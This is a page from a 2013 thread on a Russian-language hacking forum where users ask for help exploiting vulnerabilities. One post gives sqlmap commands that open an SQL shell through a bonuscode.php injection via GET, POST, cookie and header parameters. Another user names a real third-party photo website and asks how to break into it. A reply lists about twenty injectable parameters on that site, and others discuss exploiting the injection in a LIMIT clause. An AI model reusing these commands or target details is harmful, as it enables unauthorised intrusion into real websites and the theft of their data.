FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2184 из 2422

2184

Опции темы

Поиск в этой теме

Опции просмотра

05.03.2013, 16:03

Sat-hacker

Guest

Сообщений: n/a

Провел на форуме:
34457

Репутация: -10

Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.

05.03.2013, 16:51

$Аватар для \/IRUS$

\/IRUS

Guest

Сообщений: n/a

Провел на форуме:
118953

Репутация: 37

Цитата:

Сообщение от zloy_fantom

zloy_fantom said:
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");

в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell

в POST параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell

в Cookie параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell

в Referer:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell

в User-Agent:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell

в любом добавочном хидере:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell

и т.д.

05.03.2013, 18:00

zloy_fantom

Guest

Сообщений: n/a

Провел на форуме:
15180

Репутация: 0

\/IRUS

Большое спасибо, буду пробовать

05.03.2013, 19:10

borntobebad

Новичок

Регистрация: 23.03.2009

Сообщений: 14

Провел на форуме:
74797

Репутация: 0

ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut

http://www.pixheaven.net/bestof.php?begin=276&entout=12'

ili

http://www.pixheaven.net/photo.php?nom=120906_9930-46'

05.03.2013, 21:16

Unknown

Guest

Сообщений: n/a

Провел на форуме:
77731

Репутация: 33

Цитата:

Сообщение от borntobebad

borntobebad said:
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'

что-то я тоже не могу вдуплить

просмотрел сайт, вот эти уязвимые к sql-inj параметры:

Код:

Code:
/bestof.php
begin 
entout 

/bestof_us.php
begin 
entout 

/blog.php
begin 

/blog_us.php
begin 

/livredor_lire.php
begin 

/livredor_lire_us.php
begin 

/maj.php
begin 

/maj_us.php
begin 

/photo
nom 

/photo.php
nom 

/photo_us
nom 

/publications_site.php
begin 

/publications_site_us.php
begin 

/recherche_quoi.php
Afficher 
begin 
entout 

/recherche_quoi_us.php
Afficher 
begin 
entout 

/wallpapers.php
begin 
entout 

/wallpapers_us.php
begin 
entout

но ни один не смог раскрутить...

05.03.2013, 22:13

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от borntobebad

иньекция в лимите, поэтому ничего и не выходит

05.03.2013, 22:17

borntobebad

Новичок

Регистрация: 23.03.2009

Сообщений: 14

Провел на форуме:
74797

Репутация: 0

kokoy progoy ti naskanil eti dannie ? GhostW

05.03.2013, 22:19

borntobebad

Новичок

Регистрация: 23.03.2009

Сообщений: 14

Провел на форуме:
74797

Репутация: 0

qaz , tak tipo ne-kak ne razkrutit ?

05.03.2013, 23:28

$Аватар для \/IRUS$

\/IRUS

Guest

Сообщений: n/a

Провел на форуме:
118953

Репутация: 37

Цитата:

Сообщение от borntobebad

borntobebad said:
qaz , tak tipo ne-kak ne razkrutit ?

нетс

#10

05.03.2013, 23:31

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от qaz

qaz said:
иньекция в лимите, поэтому ничего и не выходит

Инъекция в Лимите прекрасно крутится.

Тут правильнее сказать "инъекция в лимите с использованием в запросе order by".

Страница 2184 из 2422

2184

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)

Быстрый переход

ANTICHAT.XYZ